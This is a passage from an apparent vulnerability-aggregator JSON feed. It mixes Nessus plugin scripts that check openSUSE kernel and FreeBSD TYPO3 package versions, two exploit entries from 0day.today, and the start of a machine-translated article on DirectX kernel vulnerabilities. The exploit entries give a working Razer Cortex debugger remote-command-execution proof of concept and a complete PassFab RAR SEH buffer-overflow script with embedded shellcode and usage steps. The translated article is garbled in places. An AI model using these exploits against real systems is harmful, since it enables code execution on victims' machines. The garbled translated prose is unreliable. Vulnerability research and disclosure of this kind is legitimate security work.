);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114839\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1115433\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1115440\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1115709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116497\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117562\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=985031\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-debuginfo-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debuginfo-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debugsource-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-debuginfo-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-debuginfo-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debuginfo-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debugsource-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-devel-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-devel-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-html-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-pdf-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-macros-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-debugsource-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-qa-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-vanilla-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-syms-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-debuginfo-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debuginfo-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debugsource-4.4.165-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-devel-4.4.165-81.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-devel / kernel-macros / kernel-source / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-18T02:16:01", "references": ["http://www.nessus.org/u?b468d07a", "http://www.nessus.org/u?277a1048"], "pluginID": "119701", "description": "Typo3 core team reports :\n\nCKEditor 4.11 fixes an XSS vulnerability in the HTML parser reported by maxarr. The vulnerability stemmed from the fact that it was possible to execute XSS inside the CKEditor source area after persuading the victim to: (i) switch CKEditor to source mode, then (ii) paste a specially crafted HTML code, prepared by the attacker, into the opened CKEditor source area, and (iii) switch back to WYSIWYG mode. Although this is an unlikely scenario, we recommend to upgrade to the latest editor version.\n\nFailing to properly encode user input, online media asset rendering (*.youtube and *.vimeo files) is vulnerable to cross-site scripting. A valid backend user account or write access on the server system (e.g.\nSFTP) is needed in order to exploit this vulnerability.\n\nFailing to properly encode user input, notifications shown in modal windows in the TYPO3 backend are vulnerable to cross-site scripting. A valid backend user account is needed in order to exploit this vulnerability.\n\nFailing to properly encode user input, login status display is vulnerable to cross-site scripting in the website frontend. A valid user account is needed in order to exploit this vulnerability - either a backend user or a frontend user having the possibility to modify their user profile.\n\nTemplate patterns that are affected are :\n\n- ###FEUSER_[fieldName]### using system extension felogin\n\n- <!--###USERNAME###--> for regular frontend rendering (pattern can be defined individually using TypoScript setting config.USERNAME_substToken)\n\nIt has been discovered that cookies created in the Install Tool are not hardened to be submitted only via HTTP. In combination with other vulnerabilities such as cross-site scripting it can lead to hijacking an active and valid session in the Install Tool.\n\nThe Install Tool exposes the current TYPO3 version number to non-authenticated users.\n\nOnline Media Asset Handling (*.youtube and *.vimeo files) in the TYPO3 backend is vulnerable to denial of service. Putting large files with according file extensions results in high consumption of system resources. This can lead to exceeding limits of the current PHP process which results in a dysfunctional backend component. A valid backend user account or write access on the server system (e.g. SFTP) is needed in order to exploit this vulnerability.\n\nTYPO3's built-in record registration functionality (aka 'basic shopping cart') using recs URL parameters is vulnerable to denial of service. Failing to properly ensure that anonymous user sessions are valid, attackers can use this vulnerability in order to create an arbitrary amount of individual session-data records in the database.", "edition": 1, "reporter": "Tenable", "published": "2018-12-17T00:00:00", "title": "FreeBSD : typo3 -- multiple vulnerabilities (bab29816-ff93-11e8-b05b-00e04c1ea73d)", "type": "nessus", "enchantments": {}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-12-17T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:typo3-8", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:typo3-9"], "id": "FREEBSD_PKG_BAB29816FF9311E8B05B00E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119701", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119701);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/12/17 10:33:00\");\n\n script_name(english:\"FreeBSD : typo3 -- multiple vulnerabilities (bab29816-ff93-11e8-b05b-00e04c1ea73d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Typo3 core team reports :\n\nCKEditor 4.11 fixes an XSS vulnerability in the HTML parser reported\nby maxarr. The vulnerability stemmed from the fact that it was\npossible to execute XSS inside the CKEditor source area after\npersuading the victim to: (i) switch CKEditor to source mode, then\n(ii) paste a specially crafted HTML code, prepared by the attacker,\ninto the opened CKEditor source area, and (iii) switch back to WYSIWYG\nmode. Although this is an unlikely scenario, we recommend to upgrade\nto the latest editor version.\n\nFailing to properly encode user input, online media asset rendering\n(*.youtube and *.vimeo files) is vulnerable to cross-site scripting. A\nvalid backend user account or write access on the server system (e.g.\nSFTP) is needed in order to exploit this vulnerability.\n\nFailing to properly encode user input, notifications shown in modal\nwindows in the TYPO3 backend are vulnerable to cross-site scripting. A\nvalid backend user account is needed in order to exploit this\nvulnerability.\n\nFailing to properly encode user input, login status display is\nvulnerable to cross-site scripting in the website frontend. A valid\nuser account is needed in order to exploit this vulnerability - either\na backend user or a frontend user having the possibility to modify\ntheir user profile.\n\nTemplate patterns that are affected are :\n\n- ###FEUSER_[fieldName]### using system extension felogin\n\n- <!--###USERNAME###--> for regular frontend rendering (pattern can be\ndefined individually using TypoScript setting\nconfig.USERNAME_substToken)\n\nIt has been discovered that cookies created in the Install Tool are\nnot hardened to be submitted only via HTTP. In combination with other\nvulnerabilities such as cross-site scripting it can lead to hijacking\nan active and valid session in the Install Tool.\n\nThe Install Tool exposes the current TYPO3 version number to\nnon-authenticated users.\n\nOnline Media Asset Handling (*.youtube and *.vimeo files) in the TYPO3\nbackend is vulnerable to denial of service. Putting large files with\naccording file extensions results in high consumption of system\nresources. This can lead to exceeding limits of the current PHP\nprocess which results in a dysfunctional backend component. A valid\nbackend user account or write access on the server system (e.g. SFTP)\nis needed in order to exploit this vulnerability.\n\nTYPO3's built-in record registration functionality (aka 'basic\nshopping cart') using recs URL parameters is vulnerable to denial of\nservice. Failing to properly ensure that anonymous user sessions are\nvalid, attackers can use this vulnerability in order to create an\narbitrary amount of individual session-data records in the database.\"\n );\n # https://typo3.org/article/typo3-952-8721-and-7632-security-releases-published/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b468d07a\"\n );\n # https://vuxml.freebsd.org/freebsd/bab29816-ff93-11e8-b05b-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?277a1048\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:typo3-8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:typo3-9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"typo3-8<8.7.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"typo3-9<9.5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-12-18T08:10:06", "references": [], "description": "Razer Cortex has a CEF debugger stub enabled by default allowing arbitrary remote command execution.", "edition": 1, "reporter": "Tavis Ormandy", "published": "2018-12-17T00:00:00", "title": "Razer Cortex Debugger Remote Command Execution Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-17T00:00:00", "id": "1337DAY-ID-31802", "href": "https://0day.today/exploit/description/31802", "sourceData": "Razer \"Cortex\" has CEF debugger stub enabled by default allowing arbitrary remote command execution. \r\n\r\n\r\nI was alerted on twitter that the software distributed by Razer for their gaming equipment might be unsafe, I downloaded the ones I could see online to take a look.\r\n\r\nI have only looked at \"Cortex\", apparently some kind of system optimizer (frankly, the claims it makes seem dubious).\r\n\r\nCortex is a CEF (Chromium Embedded) application, and unbelievably they left the debugger running and enabled by default in production builds.\r\n\r\n\r\n$ curl -si localhost:8088/json/list\r\nHTTP/1.1 200 OK\r\nContent-Length:2094\r\nContent-Type:application/json; charset=UTF-8\r\n\r\n[ {\r\n \"description\": \"\",\r\n \"devtoolsFrontendUrl\": \"/devtools/inspector.html?ws=localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)\",\r\n \"id\": \"(A6E5587C41694A59DB4142D98362B4CA)\",\r\n \"title\": \"Razer Game Deals - The best game deals on the web\",\r\n \"type\": \"page\",\r\n \"url\": \"<a href=\"https://deals.razer.com/?From=cortex&Userid=...\" title=\"\" class=\"\" rel=\"nofollow\">https://deals.razer.com/?From=cortex&Userid=...</a>\",\r\n \"webSocketDebuggerUrl\": \"ws://localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)\"\r\n} ]\r\n\r\n\r\nThat is obviously exploitable, but the mechanics are pretty tricky.\r\n\r\nRazer ship a module called RazerCortex.Modules.Deals.JsInteractions in RazerCortex.Modules.Deals.dll that contains a method JSOutBrowser.open(), that is passed directly to ShellExecute(), so you can use it for command execution.\r\n\r\n1. Read the list of pages using DNS rebinding from <a href=\"http://localhost:8088/json/list\" title=\"\" class=\"\" rel=\"nofollow\">http://localhost:8088/json/list</a>\r\n2. Open a WebSocket to the webSocketDebuggerUrl listed.\r\n\r\nDo something like:\r\n\r\nx = new WebSocket(\"ws://localhost:8088/devtools/page/(EBC04DF125124EC6E07D8CEA8A0470E8)\")\r\n\r\nx.send(JSON.stringify({\"id\":1,\"method\":\"Runtime.enable\"})) // Enable javascript evaluation\r\nx.send(JSON.stringify({\"id\":2,\"method\":\"Runtime.evaluate\",\"params\":{\"expression\":\"RazerCortexOutBrowser.open(JSON.stringify({url: \\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\calc.exe\\\"}))\"}})) // Run arbitrary commands.\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available (whichever is earlier), the bug\r\nreport will become visible to the public.\r\n\r\n\r\nFound by: taviso\n\n# 0day.today [2018-12-18] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31802"}, {"lastseen": "2018-12-18T06:31:55", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 1, "reporter": "Achilles", "published": "2018-12-16T00:00:00", "title": "PassFab RAR Password Recovery SEH Local Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-16T00:00:00", "id": "1337DAY-ID-31799", "href": "https://0day.today/exploit/description/31799", "sourceData": "# Exploit Title: PassFab RAR Password Recovery SEH Local Exploit\r\n# Vendor Homepage:https://www.passfab.com/products/rar-password-recovery.html\r\n# Software Link: https://www.passfab.com/downloads/passfab-rar-password-recovery.exe\r\n# Exploit Author: Achilles\r\n# Tested Version: 9.3.2\r\n# Tested on: Windows XP SP3\r\n\r\n\r\n# 1.- Run python code : PassFab_RAR\r\n# 2.- Open EVIL.txt and copy content to clipboard\r\n# 3.- Open PassFab RAR Password Recovery\r\n# 4.- In the new Window click on the key in the upper right corner\r\n# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code'\r\n# 6.- Click 'Register'and the calculator will open\r\n# 7.- Greetings go:XiDreamzzXi,Metatron\r\n\r\n#!/usr/bin/python\r\n\r\n#!/usr/bin/env python\r\nbuffer = \"\\x41\" * 260\r\nNSEH = \"\\xeb\\x06\\x90\\x90\" #jmp short 6\r\nSEH = \"\\xdd\\x74\\x06\\x10\" #pop pop ret SoftwareLog.dll\r\nnops = \"\\x90\" * 20\r\n\r\n#badchar \\x00\\\r\n#msfvenom -p windows/exec CMD=calc.exe -b \"\\x00\" -f python\r\nbuf = \"\"\r\nbuf += \"\\xbf\\xc6\\xde\\x94\\x3e\\xda\\xd0\\xd9\\x74\\x24\\xf4\\x5d\"\r\nbuf += \"\\x31\\xc9\\xb1\\x31\\x31\\x7d\\x13\\x03\\x7d\\x13\\x83\\xc5\"\r\nbuf += \"\\xc2\\x3c\\x61\\xc2\\x22\\x42\\x8a\\x3b\\xb2\\x23\\x02\\xde\"\r\nbuf += \"\\x83\\x63\\x70\\xaa\\xb3\\x53\\xf2\\xfe\\x3f\\x1f\\x56\\xeb\"\r\nbuf += \"\\xb4\\x6d\\x7f\\x1c\\x7d\\xdb\\x59\\x13\\x7e\\x70\\x99\\x32\"\r\nbuf += \"\\xfc\\x8b\\xce\\x94\\x3d\\x44\\x03\\xd4\\x7a\\xb9\\xee\\x84\"\r\nbuf += \"\\xd3\\xb5\\x5d\\x39\\x50\\x83\\x5d\\xb2\\x2a\\x05\\xe6\\x27\"\r\nbuf += \"\\xfa\\x24\\xc7\\xf9\\x71\\x7f\\xc7\\xf8\\x56\\x0b\\x4e\\xe3\"\r\nbuf += \"\\xbb\\x36\\x18\\x98\\x0f\\xcc\\x9b\\x48\\x5e\\x2d\\x37\\xb5\"\r\nbuf += \"\\x6f\\xdc\\x49\\xf1\\x57\\x3f\\x3c\\x0b\\xa4\\xc2\\x47\\xc8\"\r\nbuf += \"\\xd7\\x18\\xcd\\xcb\\x7f\\xea\\x75\\x30\\x7e\\x3f\\xe3\\xb3\"\r\nbuf += \"\\x8c\\xf4\\x67\\x9b\\x90\\x0b\\xab\\x97\\xac\\x80\\x4a\\x78\"\r\nbuf += \"\\x25\\xd2\\x68\\x5c\\x6e\\x80\\x11\\xc5\\xca\\x67\\x2d\\x15\"\r\nbuf += \"\\xb5\\xd8\\x8b\\x5d\\x5b\\x0c\\xa6\\x3f\\x31\\xd3\\x34\\x3a\"\r\nbuf += \"\\x77\\xd3\\x46\\x45\\x27\\xbc\\x77\\xce\\xa8\\xbb\\x87\\x05\"\r\nbuf += \"\\x8d\\x34\\xc2\\x04\\xa7\\xdc\\x8b\\xdc\\xfa\\x80\\x2b\\x0b\"\r\nbuf += \"\\x38\\xbd\\xaf\\xbe\\xc0\\x3a\\xaf\\xca\\xc5\\x07\\x77\\x26\"\r\nbuf += \"\\xb7\\x18\\x12\\x48\\x64\\x18\\x37\\x2b\\xeb\\x8a\\xdb\\x82\"\r\nbuf += \"\\x8e\\x2a\\x79\\xdb\"\r\n\r\npayload = buffer + NSEH + SEH + nops + buf\r\n\r\n\r\ntry:\r\n\tf=open(\"Evil.txt\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(payload)\r\n\tf.write(payload)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept:\r\n\tprint \"File cannot be created\"\n\n# 0day.today [2018-12-18] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31799"}], "myhack58": [{"lastseen": "2018-12-17T17:13:29", "references": [], "description": "[Operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)the kernel, is often every well-known vulnerability is the use of chain final goal. Throughout the years of Zero Day Initiative, ZDI\uff09Pwn2Own contest relates to the vulnerability, in fact, it can be found in this law. For a long time, the Windows kernel has always been to attack the main target. My personal favorite is for the various drivers of DeviceoControl call abuse, because by this vulnerability, you can access a large number of manufacturers prepared many applications, which has some driver does not implement the security code, or has not been well-tested process. \nOver the years, most for the Windows kernel-penetration attack, \u90fd\u5229\u7528\u4e86win32k.sys this is a control the Windows graphics and window management system of the kernel-mode device driver. 20 years ago, when Microsoft will this function from the CSRSS removed and added to the kernel, it immediately makes the Windows kernel-the attack surface has expanded 1-3 times. Since then, the drivers of vulnerability researchers is a\u201crich trove\u201d of. \nIn the past decade, since the WDDM\uff08Wondows display driver model replaced the earlier XDDM since another range of attack surface is also already open. Specifically, first, by win32k. sys call display system, followed by user process by means of the GDIPlus entry point directly calls dgxkrnl. sys and other driver. This expanded attack surface for the researchers to say that is a tempting target. \nIn 2018 the spring, the ZDI obtained the Tencent Cham Lu Laboratory of ChenNan and Rancholce found the 5 for DirectX kernel interface vulnerability. Which of the 4 vulnerabilities from Microsoft's CVE number. This article focuses on these vulnerabilities were analyzed, while providing a PoC proof-of-concept source code. \nFor one of the vulnerabilities ZDI-18-946/CVE-2018-8405, the Rancho and ChenNan in the 9 months of the 44CON conference delivered a speech, I strongly recommend that researchers first read the lecture slides. \nDirectX overview \nIn-depth study of vulnerability before, we first briefly introduce the DirectX interface and the driver. \nThe DirectX graphics kernel subsystem by 3 a kernel-mode driver components, \u5206\u522b\u662fdxgkrnl.sys and dxgmms1.sys\u548cdxgmms2.sys the. These drivers by win32k. sys and its own a set of interfaces to communicate with the user. In addition, \u5b83\u4eec\u8fd8\u4f1a\u4e0eBasicRender.sys and BasicDisplay. sys and Display Driver, Display Miniport Drivers communicate with. \nDirectX defines a number of complex kernel objects, most of which the names are to DXG at the beginning. The user through these complex API entry point with the DirectX connection, many of the entrance points to D3DKMT at the beginning, some other entry point to DXGK at the beginning. \nWe analyze some of the important entry point: \nD3DKMTEscape \nThe entry point will be totally the user control of the data Blob as an input. Since this is a data Blob may be very large, so it is likely it will be retained in the user memory, and not in the conversion to the kernel during the processing in the kernel to capture it. Such a model will make its call to the kernel routine it is prone to test time-Of-Check, or by using time-Of-Use\uff09vulnerabilities. Wherein the data does not use standardized structure, each driver has their own different definition. \nD3DKMTRender \nThe entry point is the actual rendering of the graphics data to the core. The user addresses commands and the patch buffer by the kernel driver to explain, and ultimately passed to the display driver. For this, you can use the race condition attack. In addition, since the rendering can be generated in the worker thread, it is more prone to race condition vulnerability. \nD3DKMTCreateAllocation \nThe entry point used to allocate memory. Due to the passed to the API calls of the different flags and a handle having between a complex interaction may occur problems, see the following ZDI-18-946 km. \nFrom the attack perspective, IOActive Ilja van Sprundel had at the 2014 Black Hat on for WDDM for a very complete overview of his presentation title is\u201cWindows kernel Graphics Driver attack surface\u201d. I strongly suggest that readers first read the relevant material, which 